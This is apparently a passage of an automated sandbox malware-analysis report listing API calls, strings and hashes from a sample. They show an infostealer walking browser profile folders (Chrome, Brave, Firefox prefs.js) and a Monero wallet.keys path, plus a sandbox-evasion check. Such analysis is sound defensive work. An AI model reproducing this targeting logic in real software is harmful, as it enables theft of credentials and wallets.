                  • Instruction Fuzzy Hash: BF01A4B1A14209EFC714DF98DD45FAEFBB8FB05B61F10422AFA45E3280C7B459048BA1
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 002E112B
                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 002E1132
                  • ExitProcess.KERNEL32 ref: 002E1143
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$AllocCurrentExitNumaVirtual
                  • String ID:
                  • API String ID: 1103761159-0
                  • Opcode ID: 569e5952d087f016d65940ff5a90562dab1c2c9210a960a4ee55a29c48da4b17
                  • Instruction ID: 436ece861a776031da1d2d1d67c052b88d373db0c90b54affc498694ff39852f
                  • Opcode Fuzzy Hash: 569e5952d087f016d65940ff5a90562dab1c2c9210a960a4ee55a29c48da4b17
                  • Instruction Fuzzy Hash: DFE08670995348FBE7206BA1DC0AB0C7678EF15B01F500054F709BA1C0C6B42615AA99
                  APIs
                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 002E10B3
                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 002E10F7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Virtual$AllocFree
                  • String ID:
                  • API String ID: 2087232378-0
                  • Opcode ID: e6199a49bd2bb3abba411395c66580b7d7802cac95f878f660792d64d356dcab
                  • Instruction ID: f5789b95762cb0915f973b7fe99da627d78ae1a2d19b6472c0bc8827dcc384dc
                  • Opcode Fuzzy Hash: e6199a49bd2bb3abba411395c66580b7d7802cac95f878f660792d64d356dcab
                  • Instruction Fuzzy Hash: 38F0E271681208BBEB149AA5AC59FBAB7E8E705B15F300458FA04E3280D5719E14DAA4
                  APIs
                    • Part of subcall function 002F78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002F7910
                    • Part of subcall function 002F78E0: RtlAllocateHeap.NTDLL(00000000), ref: 002F7917
                    • Part of subcall function 002F78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 002F792F
                    • Part of subcall function 002F7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002E11B7), ref: 002F7880
                    • Part of subcall function 002F7850: RtlAllocateHeap.NTDLL(00000000), ref: 002F7887
                    • Part of subcall function 002F7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 002F789F
                  • ExitProcess.KERNEL32 ref: 002E11C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                  • String ID:
                  • API String ID: 3550813701-0
                  • Opcode ID: 325bd44b6faf8eb596469b09271097182d183baea4863b49b8fa444101189bc7
                  • Instruction ID: 30c793ba775e03735b5d58a43669a7b6fa85bb004a84a0eb4ecb2bfbc52a0e1a
                  • Opcode Fuzzy Hash: 325bd44b6faf8eb596469b09271097182d183baea4863b49b8fa444101189bc7
                  • Instruction Fuzzy Hash: 8BE012B597430A53CE1477B1AC0AB3AB29C9F253C5F480434FB09D6202FA25F835A96A
                  APIs
                  • wsprintfA.USER32 ref: 002F38CC
                  • FindFirstFileA.KERNEL32(?,?), ref: 002F38E3
                  • lstrcat.KERNEL32(?,?), ref: 002F3935
                  • StrCmpCA.SHLWAPI(?,00300F70), ref: 002F3947
                  • StrCmpCA.SHLWAPI(?,00300F74), ref: 002F395D
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002F3C67
                  • FindClose.KERNEL32(000000FF), ref: 002F3C7C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                  • API String ID: 1125553467-2524465048
                  • Opcode ID: 3effb39d97ce6a91c71e50e338cd2adbe2c92ecca8af34b3625d06f43f5c7a19
                  • Instruction ID: d241f3f7729c584588d09264d9e08c36b2fd9366560002c20120cfe2da8e3094
                  • Opcode Fuzzy Hash: 3effb39d97ce6a91c71e50e338cd2adbe2c92ecca8af34b3625d06f43f5c7a19
                  • Instruction Fuzzy Hash: 11A14DB1A102099BDB34EF64CC85FFAB378BF59340F044598E60D96141EB74AB99CF62
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                  • FindFirstFileA.KERNEL32(00000000,?,00300B32,00300B2B,00000000,?,?,?,003013F4,00300B2A), ref: 002EBEF5
                  • StrCmpCA.SHLWAPI(?,003013F8), ref: 002EBF4D
                  • StrCmpCA.SHLWAPI(?,003013FC), ref: 002EBF63
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002EC7BF
                  • FindClose.KERNEL32(000000FF), ref: 002EC7D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                  • API String ID: 3334442632-726946144
                  • Opcode ID: ecc37e5ee2d24e8bcb89c40d2d846becb9b555f707493952f22b277592a3810d
                  • Instruction ID: bae09f63409751eed0a70b93bc61daf7700923b6f9ec7ed8ebf2bb7f1a789df2
                  • Opcode Fuzzy Hash: ecc37e5ee2d24e8bcb89c40d2d846becb9b555f707493952f22b277592a3810d
                  • Instruction Fuzzy Hash: DD4255B192010897CB14FB60DD96EFDB37CAF54340F404578FA0A96191EE74AB69CF92
                  APIs
                  • wsprintfA.USER32 ref: 002F492C
                  • FindFirstFileA.KERNEL32(?,?), ref: 002F4943
                  • StrCmpCA.SHLWAPI(?,00300FDC), ref: 002F4971
                  • StrCmpCA.SHLWAPI(?,00300FE0), ref: 002F4987
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002F4B7D
                  • FindClose.KERNEL32(000000FF), ref: 002F4B92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s$%s\%s$%s\*
                  • API String ID: 180737720-445461498
                  • Opcode ID: 706ea56370fde05f92a99a310fbe516408b16e98be9d1ba408737bd6a9df4c6d
                  • Instruction ID: 0a28bf8fc205e55dde0c0983db9c95d91356d1c031b74fdedc74b6c269ed6517
                  • Opcode Fuzzy Hash: 706ea56370fde05f92a99a310fbe516408b16e98be9d1ba408737bd6a9df4c6d
                  • Instruction Fuzzy Hash: 9B6173B1910209ABCB34EBA0DC45FFAB37CBF59340F048598F60992141EB70AB99DF91
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 002F4580
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002F4587
                  • wsprintfA.USER32 ref: 002F45A6
                  • FindFirstFileA.KERNEL32(?,?), ref: 002F45BD
                  • StrCmpCA.SHLWAPI(?,00300FC4), ref: 002F45EB
                  • StrCmpCA.SHLWAPI(?,00300FC8), ref: 002F4601
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002F468B
                  • FindClose.KERNEL32(000000FF), ref: 002F46A0
                  • lstrcat.KERNEL32(?,0132F270), ref: 002F46C5
                  • lstrcat.KERNEL32(?,0132E4F8), ref: 002F46D8
                  • lstrlen.KERNEL32(?), ref: 002F46E5
                  • lstrlen.KERNEL32(?), ref: 002F46F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                  • String ID: %s\%s$%s\*
                  • API String ID: 671575355-2848263008
                  • Opcode ID: 6e03161adb7f4814aa80181cc3c9d558879410af47fd98b4ed38acef19932395
                  • Instruction ID: 0a00f1b77caf4c733518decab831b431e6e5c35419e49f03dc711664bff87dcc
                  • Opcode Fuzzy Hash: 6e03161adb7f4814aa80181cc3c9d558879410af47fd98b4ed38acef19932395
                  • Instruction Fuzzy Hash: 5B5163B195021C9BCB24EB70DC89FFEB37CAF68740F404598F60992190EB749B999F91
                  APIs
                  • wsprintfA.USER32 ref: 002F3EC3
                  • FindFirstFileA.KERNEL32(?,?), ref: 002F3EDA
                  • StrCmpCA.SHLWAPI(?,00300FAC), ref: 002F3F08
                  • StrCmpCA.SHLWAPI(?,00300FB0), ref: 002F3F1E
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002F406C
                  • FindClose.KERNEL32(000000FF), ref: 002F4081
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s
                  • API String ID: 180737720-4073750446
                  APIs
                  • wsprintfA.USER32 ref: 002EED3E
                  • FindFirstFileA.KERNEL32(?,?), ref: 002EED55
                  • StrCmpCA.SHLWAPI(?,00301538), ref: 002EEDAB
                  • StrCmpCA.SHLWAPI(?,0030153C), ref: 002EEDC1
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002EF2AE
                  • FindClose.KERNEL32(000000FF), ref: 002EF2C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\*.*
                  • API String ID: 180737720-1013718255
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003015B8,00300D96), ref: 002EF71E
                  • StrCmpCA.SHLWAPI(?,003015BC), ref: 002EF76F
                  • StrCmpCA.SHLWAPI(?,003015C0), ref: 002EF785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002EFAB1
                  • FindClose.KERNEL32(000000FF), ref: 002EFAC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: prefs.js
                  • API String ID: 3334442632-3783873740
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0030510C,?,?,?,003051B4,?,?,00000000,?,00000000), ref: 002E1923
                  • StrCmpCA.SHLWAPI(?,0030525C), ref: 002E1973
                  • StrCmpCA.SHLWAPI(?,00305304), ref: 002E1989
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002E1D40
                  • DeleteFileA.KERNEL32(00000000), ref: 002E1DCA
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002E1E20
                  • FindClose.KERNEL32(000000FF), ref: 002E1E32
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 1415058207-1173974218
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00300C2E), ref: 002EDE5E
                  • StrCmpCA.SHLWAPI(?,003014C8), ref: 002EDEAE
                  • StrCmpCA.SHLWAPI(?,003014CC), ref: 002EDEC4
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002EE3E0
                  • FindClose.KERNEL32(000000FF), ref: 002EE3F2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                  • String ID: \*.*
                  • API String ID: 2325840235-1173974218
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003014B0,00300C2A), ref: 002EDAEB
                  • StrCmpCA.SHLWAPI(?,003014B4), ref: 002EDB33
                  • StrCmpCA.SHLWAPI(?,003014B8), ref: 002EDB49
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002EDDCC
                  • FindClose.KERNEL32(000000FF), ref: 002EDDDE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: i_z$8oYw$@T_~$_\Zk$`h}$lh}$r~$n;{
                  • API String ID: 0-1618385194
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: +>gm$8mW$<f^_$By:$hb7$o!m/$rI>m${{
                  • API String ID: 0-1382604001
                  APIs
